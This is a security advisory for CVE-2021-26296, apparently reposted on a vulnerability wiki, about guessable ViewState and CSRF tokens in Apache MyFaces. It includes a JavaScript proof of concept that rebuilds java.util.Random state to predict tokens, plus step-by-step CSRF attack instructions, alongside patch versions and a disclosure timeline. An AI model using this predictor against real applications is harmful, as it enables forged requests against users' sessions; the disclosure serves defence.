免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Ceritude Securiy Advisory - CSA-2021-001 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ PRODUCT : Apache MyFaces VENDOR : The Apache Software Foundation SEVERITY : High AFFECTED VERSION : <=2.2.13, <=2.3.7, <=2.3-next-M4, <=2.1 branches IDENTIFIERS : CVE-2021-26296 PATCH VERSION : 2.2.14, 2.3.8, 2.3-next-M5, 3.0.0 FOUND BY : Wolfgang Ettlinger, Certitude Lab ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Introduction ------------ Apache MyFaces is an open-source implementation of JSF. During a quick evaluation, Certitude found that the default CSRF protection of Apache MyFaces was insufficient as the CSRF tokens the framework generates can be guessed by an attacker. Moreover, the patch provided by the Apache MyFaces maintainers affects the way channel tokens for websocket communication are generated. It is unclear, whether this change fixes a vulnerability. Vulnerability Overview ---------------------- Applications that employ the MyFaces JSF framework transmit a parameter "javax.faces.ViewState" with every state-modifying request. Though not intended for CSRF protection, in the default configuration this parameter prevents trivial attacks, as it is sufficiently long and tied to a single session. However, by default, this value is generated using the insecure random number generator `java.util.Random`. An attacker can therefore obtain a ViewState parameter from the application and, based on this value, predict the random part of ViewState parameters subsequently issued to other users. Besides the random string, the ViewState parameter contains a sequence number. As the initial value of the per-session sequence counter is 1, an attacker can very easily guess this value. As the ViewState parameter is the sole CSRF protection, knowledge of this value allows an attacker to conduct CSRF attacks. When Apache MyFaces is used in client-side saving mode, the ViewState parameter is insufficient to protect against CSRF. Instead, pages that require protection against CSRF can be marked as "protected-pages". For these pages, Apache MyFaces requires CSRF token for each request ("javax.faces.Token"). By default, the CSRF token too is generated using `java.util.Random`, thus allowing an attacker to bypass the CSRF protection. NOTE: Besides the ViewState parameter and the CSRF token, Apache MyFaces also introduced a cryptographically secure random number generator for the websocket channel token. Certitude has not verified if this change fixes a vulnerability. Proof of Concept ---------------- By default, the class `org.apache.myfaces.application.viewstate.RandomKeyFactory` is used to generate ViewState parameter values. This class uses the method `java.util.Random#nextBytes` as well as a per-session counter value to generate ViewState strings. The following JavaScript snippet demonstrates the generation of the random part of a ViewState value based on the random part of a previously issued ViewState parameter: ``` {.javascript} const multiplier = 0x5DEECE66Dn; const addend = 0xBn; const mask = (1n << 48n) - 1n; const unbyte = (bytes, offset) => BigInt( Array.from(bytes.slice(offset, offset + 4)) .map((b, i) => b << (8 * i)) .reduce((a, b) => a + b)); const longify = n => integer(n, 8n); const intify = n => integer(n, 4n); const byteify = n => integer(n, 1n); function integer(n, len) { const bits = len * 8n; const hspan = 1n << (bits - 1n); return ((n + hspan) % (2n * hspan)) - hspan; } const hexToByteArray = s => (new Uint8Array(s.length / 2) .map((_, i) => ( parseInt(s.charAt(2 * i), 16) << 4 | parseInt(s.charAt(2 * i + 1), 16)))); const byteArrayToHex = b => (Array.from(b) .map(x => (((x + 0x100).toString(16)).substr(-2))) .reduce((a, b) => a + b)) .toUpperCase(); // based on https://github.com/fta2012/ReplicatedRandom/blob/master/ReplicatedRandom.java function replicatedRandom(bytes) { let seed = 0; replicateState( unbyte(bytes, bytes.length - 8), 32n, unbyte(bytes, bytes.length - 4), 32n); return nextBytes(bytes.length); function replicateState(nextN, n, nextM, m) { const upperMOf48Mask = ((1n << m) - 1n) << (48n - m); const oldSeedUpperN = (nextN << (48n - n)) & mask; const newSeedUpperM = (nextM << (48n - m)) & mask; let possibilityCount = 0; for (let oldSeed = oldSeedUpperN; oldSeed <= (oldSeedUpperN | ((1n << (48n - n)) - 1n)); oldSeed++) { const newSeed = longify( longify(oldSeed * multiplier + addend) & mask); if ((newSeed & upperMOf48Mask) == newSeedUpperM) { possibilityCount++; seed = newSeed; } } if (possibilityCount != 1) throw new Error('replicateState failed'); } function next(bits) { seed = longify(longify(seed * multiplier + addend) & mask); return intify(seed >> (48n - bits)); } function nextBytes(count) { const res = new Int8Array(count); for (let i = 0; i < count; ) { let rnd = next(32n); for (let n = Math.min(count - i, 4); n > 0; n--) { resi++ = parseInt(byteify(rnd)); rnd >>= 8n; } } return res; } } ``` An attacker can exploit this issue as follows: 1. An attacker lures an authenticated victim to an attacker-controlled website. 2. As the victim opens the website, the attacker requests a ViewState value from the application. 3. The exploit script opens the target JSF page e.g. in an iframe. For this page, the vulnerable application generates a new random ViewState value. 4. The attacker now predicts a number of the random strings based on the ViewState value received in step 2. As the victim's ViewState value is generated just after the attacker's ViewState value, it is very likely, that the victim's ViewState value is among the generated ones. 5. The exploit script sends several CSRF requests containing combinations of predicted random strings and sequence numbers. If guessed correctly, the vulnerable application accepts the attacker's request. A similar approach is possible to attack protected pages. Unlike the ViewState values, the CSRF token generated, however, do not contain a sequence counter. Resolution ---------- The Apache MyFaces maintainers have released a patch that addresses the identified issue. Certitude recommends affected organizations to immediately upgrade to version 2.2.14, 2.3.8, 2.3-next-M5 or 3.0.0. If an upgrade to the latest version is not possible, the Apache MyFaces maintainers recommend setting the following settings to "secureRandom": - org.apache.myfaces.RANDOM_KEY_IN_VIEW_STATE_SESSION_TOKEN - org.apache.myfaces.RANDOM_KEY_IN_CSRF_SESSION_TOKEN - org.apache.myfaces.RANDOM_KEY_IN_WEBSOCKET_SESSION_TOKEN Note that the patch introduces changes in the way websocket channel tokens are generated. Certitude therefore recommends applying the patch or workaround to all applications that use Apache MyFaces, even if CSRF attacks are of no concern. Timeline -------- --------------------------------------------------------------------------- Date Text ------------ -------------------------------------------------------------- 2020-12-15 Sending encrypted vulnerability description and proof of concept script to the Apache security team 2020-12-15 Apache security team acknowledges receipt 2020-12-28 Apache MyFaces team member requests proof of concept script 2021-01-04 Asking for encrypted communication channel 2021-01-04 Vendor provides PGP key 2021-01-05 Sending encrypted proof of concept 2021-01-07 Vendor requests more information about the PoC 2021-01-08 Providing requested information 2021-01-19 Coordination call with vendor 2021-01-26 Coordination call with vendor 2021-02-02 Coordination call with vendor, release of patches is imminent 2021-02-09 Coordination call with vendor, 3 of 4 patches have been released 2021-02-15 Coordination call with vendor, last patch release is in progress 2021-02-19 Public release of the advisory --------------------------------------------------------------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (c) 2021 Certitude Consulting GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PWNWIK.COM==免费、自由、人人可编辑的漏洞库